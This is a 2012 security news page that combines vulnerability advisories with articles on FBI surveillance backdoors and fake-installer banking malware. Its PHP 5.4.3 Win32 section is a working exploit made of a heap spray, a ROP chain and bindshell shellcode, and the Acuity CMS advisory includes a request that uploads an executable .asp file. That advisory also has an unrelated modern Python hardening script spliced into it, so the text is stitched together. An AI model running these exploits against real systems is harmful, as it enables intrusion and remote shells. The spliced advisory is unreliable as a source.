News

Acuity CMS 2.6.x (ASP-based) Arbitrary File Upload

Topic: Acuity CMS 2.6.x (ASP-based) Arbitrary File Upload
Credit: Aung Khant
Date: 2012.05.20
CWE: N/A
CVE: N/A

1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload.


2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low
priced, easy to deploy content management system. It is a leader in
its price and feature class.


3. VULNERABILITY DESCRIPTION

Acuity CMS 2.6.x (ASP-based) versions contain a flaw that may allow an
attacker to upload .asp/.aspx files without restriction, which the web
server will then execute as ASP (.NET) code. The issue is due to the script
/admin/file_manager/file_upload_submit.asp not properly validating the
'file1', 'file2', 'file3', ... 'fileX' parameters.


4. VERSIONS AFFECTED

Tested with version 2.6.2.


5. PROOF-OF-CONCEPT/EXPLOIT

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX

-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="path"

/images
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootpath"

/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootdisplay"

http://localhost/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="status"

confirmed
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="action"

fileUpload
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="file1"; filename="0wned.asp"
Content-Type: application/octet-stream

<% response.write("0wned!") %>

-----------------------------6dc3a236402e2--

[/REQUEST]
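One way to enforce the checks the upload script is missing, as an added example in Python rather than the CMS's own ASP code: it rebuilds a multipart body with the same fields as the proof-of-concept request above and applies an extension allowlist plus a web-root containment check to the file1..fileX parts. The web root, the allowlist and the build_request helper are assumptions.

```python
"""Hardened handling for an upload request shaped like the advisory's.

Added example, not Acuity CMS code. It rebuilds a multipart body with the
fields of the proof-of-concept (path, rootpath, action, file1...) and applies
the two checks the advisory says file_upload_submit.asp lacks: an extension
allowlist that refuses server-executable types, and containment of the
destination inside the web root. Web root and allowlist are assumptions.
"""
import posixpath
from email.parser import BytesParser
from email.policy import default

# 27 hyphens + id; each delimiter line on the wire is "--" + BOUNDARY, which
# matches the 29-hyphen delimiter lines in the advisory's request.
BOUNDARY = "---------------------------6dc3a236402e2"
WEB_ROOT = "/var/www/site"                         # assumed deployment path
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
# Anything the web server would execute is refused wherever it appears in the
# name, so "shell.asp.jpg" is rejected along with "shell.asp".
EXECUTABLE_MARKERS = {"asp", "aspx", "asa", "ashx", "asmx", "cer", "config"}


def _part(name, value, filename=None):
    disp = f'form-data; name="{name}"'
    if filename:
        disp += f'; filename="{filename}"'
    head = f"--{BOUNDARY}\r\nContent-Disposition: {disp}\r\n"
    if filename:
        head += "Content-Type: application/octet-stream\r\n"
    return head + "\r\n" + value + "\r\n"


def build_request(filename, content, path="/images"):
    """Constructed body with the field layout of the advisory's request."""
    parts = [_part("path", path), _part("rootpath", "/"),
             _part("rootdisplay", "http://localhost/"),
             _part("status", "confirmed"), _part("action", "fileUpload"),
             _part("file1", content, filename)]
    return ("".join(parts) + f"--{BOUNDARY}--\r\n").encode()


def parse_multipart(body, boundary=BOUNDARY):
    """Return {field: (filename or None, payload bytes)} for every part."""
    header = f'Content-Type: multipart/form-data; boundary="{boundary}"\r\n\r\n'
    msg = BytesParser(policy=default).parsebytes(header.encode() + body)
    fields = {}
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        if name is not None:
            fields[name] = (part.get_filename(), part.get_payload(decode=True))
    return fields


def validate_upload(fields, web_root=WEB_ROOT):
    """Return (accepted, reason) for a parsed upload request."""
    if fields.get("action", (None, b""))[1] != b"fileUpload":
        return False, "unexpected action"
    # Resolve the client-supplied "path" under the web root and refuse any
    # destination that normalises to a location outside it.
    rel = fields.get("path", (None, b""))[1].decode("latin-1").lstrip("/")
    dest = posixpath.normpath(posixpath.join(web_root, rel))
    if dest != web_root and not dest.startswith(web_root + "/"):
        return False, "destination escapes web root"
    uploads = [(n, fn) for n, (fn, _) in fields.items()
               if n.startswith("file") and n[4:].isdigit() and fn]
    if not uploads:
        return False, "no file part"
    for field, filename in uploads:
        # Only the base name is considered; client-supplied directories are
        # never honoured. Null bytes and ";" are classic name-truncation tricks.
        base = posixpath.basename(filename.replace("\\", "/")).lower()
        if "\x00" in base or ";" in base:
            return False, f"{field}: illegal character in filename"
        pieces = base.split(".")
        if len(pieces) < 2 or not pieces[-1]:
            return False, f"{field}: missing extension"
        if any(p in EXECUTABLE_MARKERS for p in pieces[1:]):
            return False, f"{field}: server-executable extension"
        if pieces[-1] not in ALLOWED_EXTENSIONS:
            return False, f"{field}: extension not in allowlist"
    return True, "accepted"


if __name__ == "__main__":
    poc = parse_multipart(build_request("0wned.asp", "<% ' placeholder %>"))
    print(validate_upload(poc))
    print(validate_upload(parse_multipart(build_request("logo.png", "png"))))
```

A real handler should additionally store the file under a server-generated name and serve the upload directory with script execution disabled, so that even a misclassified file is never run.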


6. SOLUTION

Acuity CMS is no longer in active development.
It is recommended to use another CMS that is in active development and supported.


7. VENDOR

The Collective

http://www.thecollective.com.au/

8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:

http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload

#yehg [2012-05-20]


New FBI Surveillance Backdoors? 6 Key Points


Will Congress require social networks, online voice over IP (VoIP) services, and Webmail providers to build in backdoors that could be used for electronic surveillance purposes by the FBI?

According to one news report, FBI officials have been meeting with Facebook, Google, Microsoft (which owns Skype and Hotmail), and Yahoo, among other companies. The goal apparently isn’t to promote the bureau’s push for expanded wiretapping capabilities, but rather to ask how that could be implemented while causing minimal disruption for the companies whose networks would be directly accessed.

Reached by phone, an FBI spokesman declined to confirm or deny the news report. But it wouldn’t be the first time in recent history in which the FBI has detailed the difficulties it faces when attempting to “wiretap” newer types of communication, from Facebook and Twitter to Skype and Xbox VoIP, and argued for greater capabilities.


Here are 6 points to consider about expanding the FBI’s surveillance powers:

1. Bureau Warns About Going Dark.
The bureau has already been asking Congress for broader surveillance powers to help it keep up with new technologies. Notably, FBI director Robert S. Mueller III told Congress in December 2011 that “a growing gap exists between the statutory authority of law enforcement to intercept electronic communications pursuant to court order and our practical ability to intercept those communications.” The consequences, he warned, could be dire. “Should this gap continue to grow, there is a very real risk of the government ‘going dark,’ resulting in an increased risk to national security and public safety.”

2. Proposed CALEA Revisions Would Update 1994 Law.
Accordingly, the FBI wants Congress to expand the Communications Assistance for Law Enforcement Act (CALEA). First passed in 1994, the purpose of the law, according to its text, is “to make clear a telecommunications carrier’s duty to cooperate in the interception of communications for Law Enforcement purposes, and for other purposes.” Specifically, the law is designed to allow law enforcement agencies, with a warrant, to conduct wiretaps of digital telephone networks. The law also made telephone carriers responsible for CALEA development and implementation costs. Congress then expanded the law in 2004 to cover broadband Internet service providers (ISPs) as well as telecommunications carriers that handle voice communications via VoIP.

But the latest proposed expansion could see the Federal Communications Commission review whether CALEA should be used to require services such as Skype, the PlayStation Network, Gmail, and similar services to make their systems easier to wiretap. CALEA requires that any encryption added by the wiretapped service be removed for law enforcement access.

3. Questions Remain Over Wiretapping Scope.
Just how often does the FBI need to use wiretapping during an investigation? That’s not clear. According to an FBI website about CALEA, wiretapping “is used infrequently and then only to combat the most serious crimes and terrorism.” It also says that law enforcement officers must “establish probable cause that the wiretaps may provide evidence of a felony violation of federal law,” after which it’s up to a judge to approve or reject the wiretap, and then to monitor any wiretapping.

4. Civil Liberties Groups See Slippery Slope.
Civil rights groups have warned that granting law enforcement agencies new surveillance powers could lead to a decrease in the privacy protections that people currently enjoy. “The heart of the issue is a growing attitude among law enforcement that there ought to be a presumption that citizens’ communications be susceptible to eavesdropping. There is no reason for such a presumption,” Jay Stanley, senior policy analyst for the Speech, Privacy and Technology Project at the American Civil Liberties Union, wrote in a blog post.

5. Will Technology Companies Back CALEA Expansion?
FBI overtures to technology giants aside, it’s far from clear whether Facebook, Google, Microsoft, and their ilk would back the proposed CALEA changes and grant the FBI direct access to their networks. In fact, they could try to torpedo such proposals, not least to distance themselves from anything involving surreptitious access to user data.

In fact, Twitter last month filed a motion in a New York state court to quash a New York City prosecutor’s request for information pertaining to Twitter user Malcolm Harris, who participated in Occupy Wall Street protests on the Brooklyn Bridge last year. Harris had already failed to quash the subpoena after a court ruled that his posts belonged not to him but to Twitter, meaning he had no legal standing to challenge the subpoena.

Interestingly, Twitter’s motion to quash instead argues that the subpoena imposes an overwhelming burden because it doesn’t give the Twitter user the ability to argue against the subpoena. Furthermore, Twitter said that its terms of service explicitly tell users that they “retain [their] rights to any Content [they] submit, post or display on or through” the service, and notes that relevant legislation allows users to challenge any demands for their account records. “To hold otherwise imposes a new and overwhelming burden on Twitter to fight for its users’ rights, since the [court order] deprives its users of the ability to fight for their own rights when faced with a subpoena from New York State,” read Twitter’s legal filing.

6. Backdoors May Facilitate Unauthorized Access.
Wiretapping backdoors could also make online services more vulnerable to attackers. In particular, adding hard-coded backdoors or access credentials for any website, application, or service is a cause for concern since this access could be abused in unintended, and potentially untraceable, ways. “Companies are also afraid of the potential security threat to trade secrets and confidential exchanges,” wrote attorney Aaron Kelly, who specializes in online privacy laws, in a blog post. “Some of them argue that a sufficiently skilled hacker could break in through a backdoor and steal personal information from a business.”


PHP 5.4.3 Win32 Code Execution

Topic: PHP 5.4.3 Win32 Code Execution
Credit: Maksymilian Motyl
Date: 2012.05.19
CWE: CWE-119
CVE: N/A

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)


===================
offset-brute.html
===================

<html><body>
<title>0day</title>
<center>
<font size=7>PHP 5.4.3 0day by 0in cOndis</font><br>
<textarea rows=50 cols=50 id="log"></textarea>
</center>
<script>
// Busy-wait so that each request has time to reach the server before the next offset is tried.
function sleep(milliseconds) {
    var start = new Date().getTime();
    for (var i = 0; i < 1e7; i++) {
        if ((new Date().getTime() - start) > milliseconds) {
            break;
        }
    }
}
function makeRequest(url, parameters)
{
    var xmlhttp = null;
    if (window.XMLHttpRequest) {
        xmlhttp = new XMLHttpRequest();
        if (xmlhttp.overrideMimeType) {
            xmlhttp.overrideMimeType('text/xml');
        }
    } else if (window.ActiveXObject) {
        // IE
        try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
        catch (e) {
            try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
            catch (e) {}
        }
    }

    if (!xmlhttp) {
        alert('Giving up :( Cannot create an XMLHTTP instance');
        return false;
    }

    xmlhttp.open("GET", url, true);
    xmlhttp.send(null);
    return true;
}
// Walk the candidate offsets; each request hands one offset to 0day.php.
var log = document.getElementById("log");
for (offset = 0; offset < 300; offset++)
{
    log.value += "Trying offset:" + offset + "\r\n";
    makeRequest("0day.php?offset=" + offset);
    sleep(500);
}

</script></body></html>

===================
0day.php
===================

<?php

$spray = str_repeat("\x90",0x200);
$offset=$_GET['offset'];
// 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll]
$spray = substr_replace($spray, "\xda\xf0\x5d\x77", (strlen($spray))*-1,(strlen($spray))*-1);
// : 0x048d0030
$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1);

//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll]
$spray = substr_replace($spray, "\x9f\xae\x52\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1);

// Address of VirtualProtect 0x7c801ad4
$spray = substr_replace($spray, "\xd4\x1a\x80\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1);

// LPVOID lpAddress = 0x048d0060
$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);

// SIZE_T dwSize = 0x01000000
$spray = substr_replace($spray, "\x00\x00\x10\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1);

// DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0
$spray = substr_replace($spray, "\x40\x00\x00\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1);
// __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000

// 0x048d0068
$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1);

//0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll]
$spray = substr_replace($spray, "\xb4\xe8\xdf\x77", (strlen($spray)-0x18)*-1,4);
// Ret Address = 0x048d0080
$spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4);

$stacktrack = "\xbc\x0c\xb0\xc0\x00";
// Universal win32 bindshell on port 1337 from metasploit
$shellcode = $stacktrack."\x33\xc9\x83\xe9\xb0".
"\x81\xc4\xd0\xfd\xff\xff".
"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
"\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
"\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
"\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
"\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
"\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
"\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
"\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
"\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
"\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
"\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
"\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
"\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
"\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
"\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
"\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
"\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
"\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
"\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
"\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
"\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
"\x4e\x33\xe4\x96\xcd\xcc\x32\x69";


$spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode)));
$fullspray="";
// Repeat the block to fill the heap so that the sprayed addresses above are populated.
for($i=0;$i<0x4b00;$i++)
{
$fullspray.=$spray;
}
$j=array();
$e=array();
$b=array();
$a=array();
$c=array();

array_push($j,$fullspray);
array_push($e,$fullspray."W");
array_push($b,$fullspray."A");
array_push($a,$fullspray."S");
array_push($c,$fullspray."!");


$vVar = new VARIANT(0x048d0038+$offset);
// Shoot him
com_print_typeinfo($vVar); //CRASH - 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10]

echo $arr;

echo $spray;

?>


OpenOffice.org Memory Overwrite Vulnerability

Topic: OpenOffice.org Memory Overwrite Vulnerability
Credit: Kestutis Gudinavicius
Date: 2012.05.17
CWE: N/A
CVE: CVE-2012-2149



CVE-2012-2149 OpenOffice.org memory overwrite vulnerability

Reference: http://www.openoffice.org/security/cves/CVE-2012-2149.html

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:

OpenOffice.org 3.3 and 3.4 Beta, on all platforms.
Earlier versions may also be affected.

Description:

Affected versions of OpenOffice.org use a customized libwpd that has a
memory overwrite vulnerability that could be exploited by a specially
crafted WordPerfect WPD-format document, potentially leading to
arbitrary-code execution at the application user's privilege level.

Mitigation

OpenOffice.org 3.3.0 and 3.4 beta users are advised to upgrade to
Apache OpenOffice 3.4, where WPD files are ignored. Users who are
unable to upgrade immediately should be cautious when opening
untrusted WPD documents.

Credits

The Apache OpenOffice Security Team acknowledges Kestutis Gudinavicius
of SEC Consult Unternehmensberatung GmbH as the discoverer of this flaw.


Fake Google Chrome Installer Steals Banking Details

Beware fake Chrome installers for Windows.

A file named “ChromeSetup.exe” is being offered for download on various websites, and the link to the file appears to be legitimately hosted on Facebook and Google domains. In reality, the software won’t install Google’s Chrome browser, but an information-stealing Trojan application known as Banker, according to antivirus vendor Trend Micro.

Once the malware, which appears to be targeting Latin American users, especially in Brazil and Peru, is executed, it relays the IP address and operating system version to one of two command-and-control (C&C) servers, then downloads a configuration file. After that, whenever a user of the infected PC visits one of a number of banking websites, the malware intercepts the HTTP request, redirects the user to a fake banking page, and also pops up a dialog box informing the user that new security software will be installed.

In fact, the malware has been designed to uninstall GbPlugin, which is “software that protects Brazilian bank customers when performing online banking transactions,” said Trend Micro security researcher Brian Cayanan in a blog post. “It does this through the aid of gb_catchme.exe, a legitimate tool from GMER called Catchme, which was originally intended to uninstall malicious software. The bad guys, in this case, are using the tool for their malicious agendas.”


Trend Micro gained access to a log file associated with the C&C servers that were managing this strain of Banker and saw the number of PCs infected with the malware quickly multiply. “During the time the C&C panel was analyzed … the phone-home logs jumped from around 400 to nearly 6,000 in a span of 3 hours. These logs are comprised of 3,000 unique IP addresses, which translates [into] the number of machines infected by the malware,” Cayanan said. But the C&C servers, first spotted in use in October 2011, soon became inaccessible. That suggests that attackers were moving to new C&C servers, he said, noting that whoever is behind Banker will likely continue to enhance the malicious application’s capabilities.

For now, however, Cayanan said Trend Micro was continuing to study the malware, noting that “the one missing piece” of information is how the malware “is able to redirect [users] from normal websites like Facebook or Google to its malicious IP, to download malware.”

In other malware news, GFI Labs is warning that a new piece of Android malware masquerades as free antivirus software. Advertised via Twitter spam promoting links to “sexi gerl see,” among other phrases, the malicious application has been available via websites sporting a dot-TK (.tk) address, which is the top-level domain name for Tokelau, a New Zealand territory in the South Pacific.

Clicking on the proffered Twitter link takes users to a Russian-language Web page, hosted in the Ukraine, that advertises numerous products, including fake updates for Opera and Skype, as well as an “Anit-Virus Scanner.” [sic] “Users who accessed and used this purported scanner are then given the option to download and install a file, which [varies] depending on whether the target is a PC or a phone,” said GFI Labs researcher Jovi Umawing in a blog post. Interestingly, the PC version, delivered as a Java archive file, will fail to execute. But the APK (Android application package) version will install on an Android device. The application’s Android icon, meanwhile, was copied from security firm Kaspersky.

Many security tools will have difficulty spotting the malicious APK file. According to Bulgarian antivirus researcher Vesselin Bontchev at FRISK Software, “the fake AV file is actually server-side polymorphic.” Polymorphic malware is designed to change every time it gets downloaded, which generates malware with identical attack capabilities but different fingerprints. That makes spotting the malware more difficult for signature-based security defenses.

“If you download it several times in a row, you’ll get different APK files,” said Bontchev. He said it’s also likely that the malware developer is updating the attack code every few days to make the malware more difficult to spot.

What’s the purpose of the Anit-Virus Scanner malware? As with most online attacks, blame the software on criminals trying to make a fast buck (or in this case, ruble). “If you went ahead and installed the app onto your mobile, it would attempt to send expensive SMS messages to premium rate services,” read a blog post from Graham Cluley, senior technology consultant at Sophos, who has also been studying the malware.

As with most malware, the fake antivirus scanner also has the ability to download and install further code from the Internet onto your Android smartphone, thus potentially allowing attackers to exploit devices, or the data they store, in numerous other ways.

